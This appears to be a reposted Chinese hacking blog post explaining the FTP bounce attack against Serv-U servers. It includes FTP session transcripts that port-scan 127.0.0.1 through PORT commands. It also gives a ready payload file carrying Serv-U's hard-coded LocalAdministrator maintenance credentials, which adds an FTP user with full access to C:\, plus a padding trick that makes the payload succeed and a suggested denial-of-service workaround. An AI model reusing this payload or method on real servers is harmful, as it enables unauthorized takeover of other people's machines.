分享
 
 
 

Serv-U的反弹攻击及其利用

王朝other·作者佚名  2006-12-10
窄屏简体版  字體: |||超大  

Author:lake2 ( http://lake2.0x54.org )

FTP反弹攻击(FTP Bounce Attack)是很古老的技术了,居然能在我们的信息安全教材上找得到介绍,可见其确实年代久远。

所谓FTP反弹攻击就是利用FTP协议的PORT命令将数据发送到第三方,这样就可以利用FTP服务器实现对其他机器的端口扫描和发送数据了。由于这种攻击的存在,所以FTP服务器一般都限制了PORT命令的ip地址为客户端ip且端口大于1024。

现在比较流行的FTP软件Serv-U默认情况下(似乎?)却没有限制FTP Bounce攻击,造成安全隐患。

以下是对有限制的Serv-U进行反弹攻击:

220-欢迎光临lake2的blog

user lake2

331 User name okay, need password.

pass xxxxxxxxx

230 User logged in, proceed.

port 127,0,0,1,171,182

530 Only client IP address allowed for PORT command.

失败了,因为管理员在设置那里勾上了“拦截FTP Bounce攻击”。

但是,一些Serv-U却可以实现反弹(默认情况下没有阻止FTP Bounce):

220-欢迎使用本虚拟主机.

user 0x54.org

331 User name okay, need password.

pass xxxxxxxxxxxx

230 User logged in, proceed.

port 127,0,0,1,171,182

200 PORT Command successful.

list

150 Opening ASCII mode data connection for /bin/ls.

226-Maximum disk quota limited to 204800 kBytes

Used disk quota 81766 kBytes, available 123033 kBytes

226 Transfer complete.

port 127,0,0,1,171,183

200 PORT Command successful.

list

150 Opening ASCII mode data connection for /bin/ls.

426-Maximum disk quota limited to 204800 kBytes

Used disk quota 81766 kBytes, available 123033 kBytes

426 Data connection closed, transfer aborted.

命令“port 127,0,0,1,171,182”就是把数据发送到FTP服务器的43958(171*256+182=43958)端口,因为该端口是开放的,所以数据发送成功;第二次把数据发送到43959端口,该端口关闭,所以发送失败。根据返回的结果,就实现了端口扫描(由于限制,只能扫描大于1024的端口)。大名鼎鼎的扫描器NMAP就有利用FTP反弹实现端口扫描的功能。

利用反弹攻击也可以发送任意数据,把要发送的数据写到文件中然后RETR就行了。既然可以发送任意数据,当然包括向43958端口发送添加有执行权限的FTP用户的命令咯。这真是个令人兴奋的主意。

以下内容保存为test.txt并传到FTP根目录:

user LocalAdministrator

Pass #l@$ak#.lk;0@P

SITE MAINTENANCE

-SETUSERSETUP

-IP=0.0.0.0

-PortNo=21

-User=lake

-Password=admin123

-HomeDir=c: -LoginMesFile=

-Disable=0

-RelPaths=1

-NeedSecure=0

-HideHidden=0

-AlwaysAllowLogin=0

-ChangePassword=0

-QuotaEnable=0

-MaxUsersLoginPerIP=-1

-SpeedLimitUp=0

-SpeedLimitDown=0

-MaxNrUsers=-1

-IdleTimeOut=600

-SessionTimeOut=-1

-Expire=0

-RatioUp=1

-RatioDown=1

-RatiosCredit=0

-QuotaCurrent=0

-QuotaMaximum=0

-Maintenance=None

-PasswordType=Regular

-Ratios=None

Access=c:\|RWAMELCDP

然后retr test.txt,添加用户的数据就发过去了。

每次都莫名其妙的添加失败,后来试验多次才发现是由于数据发送太快43958端口那边还没来得及响应连接就就关闭了。解决办法是在test.txt文件前面添加许多无用数据,当文件达到1M多的时候,哈哈,成功了!

以上是在5.2版本的情况,但在6.3版本上,情况不妙,43958端口限制了接收数据大小,几十K都不行了,何况一个1M的大文件呢。

这个地方一直没想到好的解决办法,似乎有两点思路供参考:

1、 上传/下载大文件,降低其处理速度

2、 对FTP服务器进行拒绝服务攻击,消耗资源降低处理速度

以上只是猜想没有去实践,姑且叫“lake2猜想”吧,谁把它解决了,我请吃饭哦^_^

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有